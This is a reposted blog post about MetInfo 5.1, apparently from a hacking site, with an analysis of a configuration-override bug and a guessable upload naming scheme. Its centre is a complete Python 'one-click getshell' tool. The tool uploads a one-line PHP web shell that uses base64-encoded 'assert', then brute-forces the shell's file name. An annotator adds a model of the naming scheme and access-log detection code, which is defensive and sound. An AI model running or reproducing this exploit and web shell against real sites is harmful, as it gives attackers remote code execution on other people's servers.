# MetInfo 5.1 automated getshell tool

title: MetInfo V5.1 GetShell one-click tool
date: 2016-06-08 22:40:32
categories: Hacker
tags:
 - Hacker
 - Tools
---
----------
# Vulnerability analysis:
----------
**config/config.inc.php**
```php
$langoks = $db->get_one("SELECT * FROM $met_lang WHERE lang='$lang'");

if(!$langoks)die('No data in the database,please reinstall.');

if(!$langoks[useok]&&!$metinfoadminok)okinfo('../404.html');

if(count($met_langok)==1)$lang=$met_index_type;

// $lang comes from the request (see the URL below), so the WHERE clause is caller-controlled
$query = "SELECT * FROM $met_config WHERE lang='$lang' or lang='metinfo'";

$result = $db->query($query);

while($list_config= $db->fetch_array($result)){

    // the page copy had these HTML entities decoded into a no-op; the original escapes to &quot; and &#39;
    if($metinfoadminok)$list_config['value']=str_replace('"', '&quot;', str_replace("'", '&#39;',$list_config['value']));

    $settings_arr[]=$list_config;

    if($list_config['columnid']){
        $settings[$list_config['name'].'_'.$list_config['columnid']]=$list_config['value'];
    }else{
        $settings[$list_config['name']]=$list_config['value'];
    }

}

// every row that was loaded becomes a PHP variable named after its 'name' column
@extract($settings);
```
----------
Visiting

http://localhost/metinfo5.1/index.php?lang=metinfo

turns the query into

`SELECT * FROM met_config WHERE lang='metinfo' or lang='metinfo'`

so only the rows stored under the pseudo-language `metinfo` end up in `$settings`; the per-language configuration rows that `extract()` would normally turn into variables are never loaded for this request.

----------
## File naming scheme:
----------
**/feedback/uploadfile_save.php**
```php
srand((double)microtime() * 1000000);   // seed from the clock
$rnd = rand(100, 999);                  // random offset, 100..999
$name = date('U') + $rnd;               // Unix timestamp PLUS the offset: integer addition, not concatenation
$name = $name.".".$ext;
```
**Files are saved under /upload/file/**

The name is the Unix timestamp of the upload plus a random number between 100 and 999. Because this is arithmetic addition, the name always lies in a window of 900 values just above the upload time; in practice that looks like "the timestamp with its last three digits replaced by a three-digit number", except that the addition can carry into the fourth digit from the end.

A window that small can be brute-forced, e.g.

http://127.0.0.1/upload/file/1465394396.php

----------
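An added example (my code, not the page's or the tool author's) that models the naming scheme above in Python: it reproduces `date('U') + rand(100, 999)`, enumerates the 900 names an upload made at a given second can receive, and compares that with the enumeration the page's tool uses (the current timestamp with its last four digits dropped, then a digit 0-9 and a number 100-999) to show where the two disagree. The timestamp 1465394396 is the one from the example URL; treating it as the upload time is an assumption made for illustration.

```python
import random


def metinfo_upload_name(upload_ts, rnd, ext='php'):
    """Mirror of uploadfile_save.php: $name = date('U') + rand(100, 999); $name .= '.' . $ext.
    The '+' is integer addition, so the random part shifts the timestamp instead of
    being appended to it."""
    if not 100 <= rnd <= 999:
        raise ValueError('rand(100, 999) never returns %r' % rnd)
    return '%d.%s' % (upload_ts + rnd, ext)


def simulate_upload(upload_ts, seed=None, ext='php'):
    """Draw the offset the way the PHP does (seeded so a run is repeatable)."""
    rng = random.Random(seed)
    return metinfo_upload_name(upload_ts, rng.randint(100, 999), ext)


def candidate_names(upload_ts, ext='php'):
    """Every name the scheme can produce for an upload at upload_ts:
    exactly 900 values, upload_ts + 100 through upload_ts + 999."""
    return ['%d.%s' % (upload_ts + r, ext) for r in range(100, 1000)]


def tool_style_candidates(now_ts, ext='php'):
    """The enumeration the page's tool uses: drop the last four digits of the current
    timestamp, then append i (0-9) followed by j (100-999): 9000 requests."""
    prefix = str(now_ts)[:-4]
    return ['%s%d%d.%s' % (prefix, i, j, ext) for i in range(10) for j in range(100, 1000)]


def coverage_gap(upload_ts, now_ts=None, ext='php'):
    """Names the real scheme can produce that the tool-style enumeration never requests.
    The addition can carry into the fourth digit from the end, giving names whose last
    three digits are 000-099; the tool only ever tries 100-999 there. If now_ts has
    crossed a 10000-second boundary since the upload, the prefix differs and nothing matches."""
    now_ts = upload_ts if now_ts is None else now_ts
    return sorted(set(candidate_names(upload_ts, ext)) - set(tool_style_candidates(now_ts, ext)))


if __name__ == '__main__':
    ts = 1465394396  # assumed upload time, taken from the page's example URL
    print(simulate_upload(ts, seed=1))
    print(len(candidate_names(ts)), 'possible names,',
          len(coverage_gap(ts)), 'of them never tried by the tool-style enumeration')
```

For an upload at 1465394396 the tool-style list misses the 100 names 1465395000.php to 1465395099.php, which the scheme can legitimately produce; enumerating `range(upload_ts + 100, upload_ts + 1000)` directly is both smaller (900 requests instead of 9000) and complete.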
    
# One-click exploitation tool:

----------

**This program is written in Python** (the page's copy was Python 2 and was cut off before the threads were started; it is ported to Python 3 and completed here)

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import queue
import sys
import threading
import time

import requests

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.10 Safari/537.36'}

urls = queue.Queue()
# the paths tried look like <target>/upload/file/1441445378.php


def bp(urls, time_out):
    """Worker: pull candidate URLs off the queue and record the ones that exist."""
    while True:
        try:
            base_url = urls.get_nowait()
        except queue.Empty:
            return
        response = None

        try:
            time.sleep(int(time_out))  # per-request delay
            response = requests.get(base_url, headers=headers)
            if response.status_code == 404:
                print('Not Found----%s' % base_url)
        except requests.RequestException:
            continue
        finally:
            # a requests.Response is truthy only for status < 400, so only hits are logged
            if response:
                with open('url.txt', 'a+') as f:
                    f.write('%s?e=YXNzZXJ0\n' % base_url)


def main(target_url, thread_num, time_out):

    # current timestamp with the last four digits dropped; the brute-force below
    # fills those four digits in with i (0-9) followed by j (100-999)
    now = str(int(time.time()))[:-4]

    # enqueue every candidate path
    for i in range(0, 10):
        for j in range(100, 1000):
            num_str = ''.join((str(i), str(j)))
            url = ''.join(('%s/upload/file/%s' % (target_url, now), num_str, '.php'))
            urls.put(url)

    # upload the file: a one-line shell that passes $_REQUEST['Akkuman'] to the function
    # named by base64_decode($e) (e=YXNzZXJ0 decodes to "assert")
    with open('xiaoma.php', 'w+') as fi:
        fi.write("<?php $e = $_REQUEST['e'];register_shutdown_function(base64_decode($e), $_REQUEST['Akkuman']);?>")
    data = {
        'fd_para[1][para]': 'filea',
        'fd_para[1][type]': '5'
    }
    # lang=metinfo triggers the config.inc.php behaviour analysed above; met_file_format and
    # met_file_maxsize are supplied in the query string alongside it
    upload_url = '%s/feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo' % target_url
    with open('xiaoma.php', 'rb') as fh:
        files = {'filea': fh}
        res = requests.post(upload_url, data=data, files=files, headers=headers)
    print('upload request returned HTTP %d' % res.status_code)
    # give the upload two seconds to land
    time.sleep(2)

    # start the brute-force workers and wait for them (this part was missing from the page copy)
    workers = [threading.Thread(target=bp, args=(urls, time_out)) for _ in range(int(thread_num))]
    for w in workers:
        w.start()
    for w in workers:
        w.join()


if __name__ == '__main__':
    if len(sys.argv) != 4:
        print('usage: %s http://target thread_count delay_seconds' % sys.argv[0])
        sys.exit(1)
    main(sys.argv[1], sys.argv[2], sys.argv[3])
```
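The tool above leaves a distinctive footprint in a web server's access log: one POST to `/feedback/uploadfile_save.php` with `met_file_format`/`met_file_maxsize` and `lang=metinfo` in the query string, followed by a burst of GETs for ten-digit `.php` names under `/upload/file/`, almost all of them 404. As an added example (my code, not the page's or MetInfo's), here is detection logic for that pattern run over a constructed Apache combined-format log; the client addresses, timestamps and threshold are made up for illustration.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" access-log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# The upload request the tool sends: uploadfile_save.php with the upload
# settings supplied in the query string.
UPLOAD_RE = re.compile(r'^/feedback/uploadfile_save\.php\?.*\b(met_file_format|met_file_maxsize)=')
# A probe for a timestamp-named file: ten digits, .php, optional query string.
PROBE_RE = re.compile(r'^/upload/file/\d{10}\.php(\?.*)?$')


def classify(line):
    """Return (ip, kind, status) with kind in {'upload', 'probe', None}, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group('path')
    kind = None
    if m.group('method') == 'POST' and UPLOAD_RE.match(path):
        kind = 'upload'
    elif m.group('method') == 'GET' and PROBE_RE.match(path):
        kind = 'probe'
    return m.group('ip'), kind, int(m.group('status'))


def detect(lines, probe_threshold=20):
    """Per-client counters plus the sorted list of clients that look like this tool.

    A client is flagged if it sent the parameter-overriding upload request at all,
    or if it produced at least probe_threshold 404s on timestamp-named .php files.
    """
    counts = defaultdict(lambda: {'upload': 0, 'probe': 0, 'probe_404': 0, 'probe_hit': 0})
    for line in lines:
        parsed = classify(line)
        if parsed is None:
            continue
        ip, kind, status = parsed
        c = counts[ip]
        if kind == 'upload':
            c['upload'] += 1
        elif kind == 'probe':
            c['probe'] += 1
            if status == 404:
                c['probe_404'] += 1
            elif status == 200:
                c['probe_hit'] += 1
    flagged = sorted(ip for ip, c in counts.items()
                     if c['upload'] or c['probe_404'] >= probe_threshold)
    return flagged, dict(counts)


# Constructed sample log, not real traffic: one attacker at 203.0.113.7 and one
# ordinary visitor at 198.51.100.4 (both documentation-range addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Jun/2016:22:40:32 +0800] "POST /feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Jun/2016:22:40:35 +0800] "GET /upload/file/1465394100.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Jun/2016:22:40:36 +0800] "GET /upload/file/1465394101.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Jun/2016:22:40:37 +0800] "GET /upload/file/1465394102.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Jun/2016:22:40:38 +0800] "GET /upload/file/1465394896.php?e=YXNzZXJ0 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [08/Jun/2016:22:41:02 +0800] "GET /index.php?lang=cn HTTP/1.1" 200 8731 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [08/Jun/2016:22:41:05 +0800] "GET /upload/file/brochure.pdf HTTP/1.1" 200 40211 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == '__main__':
    flagged, counts = detect(SAMPLE_LOG, probe_threshold=3)
    for ip in flagged:
        print(ip, counts[ip])
```

The upload signature alone is enough to flag a client; the 404 threshold catches the brute-force phase even when the upload went to a different front end or was not logged, and the `probe_hit` counter tells the responder which name finally answered 200.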

---Reposted from hacktech.cn
Original address: https://www.cnblogs.com/zgyc/p/6237753.html